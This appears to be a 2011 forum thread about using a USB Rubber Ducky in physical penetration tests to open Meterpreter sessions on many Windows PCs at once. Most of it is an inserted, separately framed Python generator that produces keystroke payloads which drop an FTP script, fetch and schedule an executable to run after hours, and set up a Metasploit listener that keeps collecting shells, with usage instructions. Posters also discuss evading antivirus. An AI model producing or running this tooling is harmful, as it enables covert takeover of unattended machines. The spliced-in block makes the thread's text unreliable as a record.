mackwage Posted October 5, 2011
Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once, as netcat cannot juggle multiple connections. Was trying to think if, during a physical pentest, you could use the Ducky on every PC in sight to send a Meterpreter session back to your computer so you have a shell on all of them at once. Thoughts?
pyro2927 Posted October 6, 2011
> Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once, as netcat cannot juggle multiple connections. Was trying to think if, during a physical pentest, you could use the Ducky on every PC in sight to send a Meterpreter session back to your computer so you have a shell on all of them at once. Thoughts?
Interesting you bring that up! I just started working on getting something like that working about 3 hours ago with the help of SET. I'll report back when I make progress.
pyro2927 Posted October 6, 2011
> Great! Keep me up to date! :)
I certainly will! It will actually be similar to his Teensy attack from SET. It'll create an inject.bin file that will type out binary in Notepad, use some PowerShell, and run it. I'm running into a SET issue right now with it being finicky about importing 3rd-party modules, but I'll definitely keep this thread posted with info.
Netshroud Posted October 6, 2011
Why not just run msfpayload, then use the same old tricks to decode and run the executable?
Mr-Protocol Posted October 6, 2011
I am trying to make my Teensy just FTP and download, then exec a Meterpreter payload. Just need to make an "AV-friendly" one. Other than that, my code is done.
Edited October 6, 2011 by Mr-Protocol
Darren Kitchen Posted October 6, 2011
A quick-to-deploy and effective payload creates a txt file with FTP commands, then schedules an "FTP -S" task to run said commands at a specific time (like after hours, when the user is away from their desk) using the AT command. The SET binary-to-hex converter will work on the Ducky, as does IllWill's encode.vbs and decode.vbs: http://dabermania.blogspot.com/2011/03/converting-any-file-to-ascii-for.html
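The FTP-command-file plus AT technique from the post above, written out as a small generator, as an added example that is not code from the original thread, from SET, or from Hak5. The Ducky only types keystrokes, so the payload is expressed as lines typed into cmd.exe: one `echo` per line of the FTP script, then an `at` job that runs `ftp -s:` against that file. The generator also emits a Metasploit resource script for a handler with `ExitOnSession false`, which is what lets one listener collect a session from every box the Ducky is plugged into (the question in the first post). The host, credentials, file names, paths and the 02:30 run time are hypothetical values; the assumption that the current user may create AT jobs (on Vista/7 that needs an elevated prompt) is also mine, not the post's.

```python
"""Generate a USB Rubber Ducky payload that drops an FTP command file and
schedules 'ftp -s:<file>' with the AT command.

Added example, not code from the original thread, SET, or Hak5.  All host
names, credentials, paths and times below are hypothetical.  Assumes the
target is a Windows box where the current user may create AT jobs.
"""

from dataclasses import dataclass


@dataclass(frozen=True)
class FtpDrop:
    host: str          # FTP server the target connects back to (hypothetical)
    user: str
    password: str
    remote_file: str   # file to fetch from the FTP server
    local_file: str    # where to save it on the target
    script_path: str   # where the ftp command file is written on the target
    run_at: str        # "HH:MM" as accepted by AT


def ftp_script_lines(drop: FtpDrop) -> list[str]:
    """Lines of the command file consumed by 'ftp -s:<file>'.

    ftp.exe reads the script line by line: 'open' prompts for a user name
    and password, which are answered by the next two lines.  'binary' is
    needed so an executable is not mangled by ASCII-mode transfer.
    """
    return [
        f"open {drop.host}",
        drop.user,
        drop.password,
        "binary",
        f"get {drop.remote_file} {drop.local_file}",
        "quit",
    ]


_CMD_SPECIAL = set("&|<>^()")


def cmd_escape(text: str) -> str:
    """Escape cmd.exe metacharacters so 'echo' writes them literally
    (a password containing '&' would otherwise split the command)."""
    return "".join("^" + ch if ch in _CMD_SPECIAL else ch for ch in text)


def ducky_payload(drop: FtpDrop, delay_ms: int = 500) -> str:
    """Ducky Script: open cmd.exe via the Run dialog, write the ftp command
    file one 'echo' at a time, schedule it with AT, and close the window.

    The redirection is placed *before* the echoed text ('>>file echo text')
    so a line ending in a digit is not misread as a handle number (cmd would
    treat 'echo abc1>>file' as redirecting handle 1) and no trailing space
    ends up in the file.
    """
    lines = ["DELAY 1000", "GUI r", f"DELAY {delay_ms}", "STRING cmd", "ENTER",
             f"DELAY {delay_ms}"]
    for i, ftp_line in enumerate(ftp_script_lines(drop)):
        redirect = ">" if i == 0 else ">>"   # first line creates/truncates
        lines += [f"STRING {redirect}{drop.script_path} echo {cmd_escape(ftp_line)}",
                  "ENTER"]
    # AT takes HH:MM and a command line; cmd /c runs the fetch, then the file.
    lines += [f'STRING at {drop.run_at} cmd /c "ftp -s:{drop.script_path} '
              f'&& {drop.local_file}"', "ENTER", "STRING exit", "ENTER"]
    return "\n".join(lines) + "\n"


def handler_rc(lhost: str, lport: int,
               payload: str = "windows/meterpreter/reverse_tcp") -> str:
    """Metasploit resource script for one listener that keeps accepting
    connections.  ExitOnSession false stops the handler from quitting after
    the first callback; '-j -z' runs it as a background job, so every
    Ducky'd box ends up as its own session in the same msfconsole."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j -z",
    ]) + "\n"


if __name__ == "__main__":
    # Constructed, hypothetical values for illustration only.
    drop = FtpDrop("10.0.0.5", "anonymous", "duck@example.com",
                   "met.exe", "C:\\Windows\\Temp\\svc.exe",
                   "C:\\Windows\\Temp\\f.txt", "02:30")
    print(ducky_payload(drop))
    print(handler_rc("10.0.0.5", 4444))
```

Feed the printed Ducky Script to the encoder to produce inject.bin, and load the resource script with `msfconsole -r handler.rc` before plugging the duck into anything.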
pyro2927 Posted October 7, 2011
SET payload is almost done. It's all in Python, and this will be my 2nd Python script ever, so it's taking some time as I learn the syntax and stuff. Whitespace dependence is not something that is easy to work with, but I'm getting used to it. The script actually runs and works and creates an inject.bin, though it's dependent on duckencoder/jpduckencoder to actually create the bin file. I'm hoping to port the conversion code to Python and have it all self-contained, and clean up the script. If it gets fully done I'll post it this weekend!
nopenopenope Posted October 7, 2011
Or just use the single netcat, escalate that to a Meterpreter session, pivot, and then get multiple sessions? But sticking in a duck and pwning is so much faster than pivoting, lol. But that's another option; the biggest step is getting your foot in the door and moving around from there.
pyro2927 Posted October 7, 2011
I got some code running on my Ducky, but I'm getting an error when it tries to run the PowerShell command: http://cl.ly/3p3X0G3a1p1v2p352K3O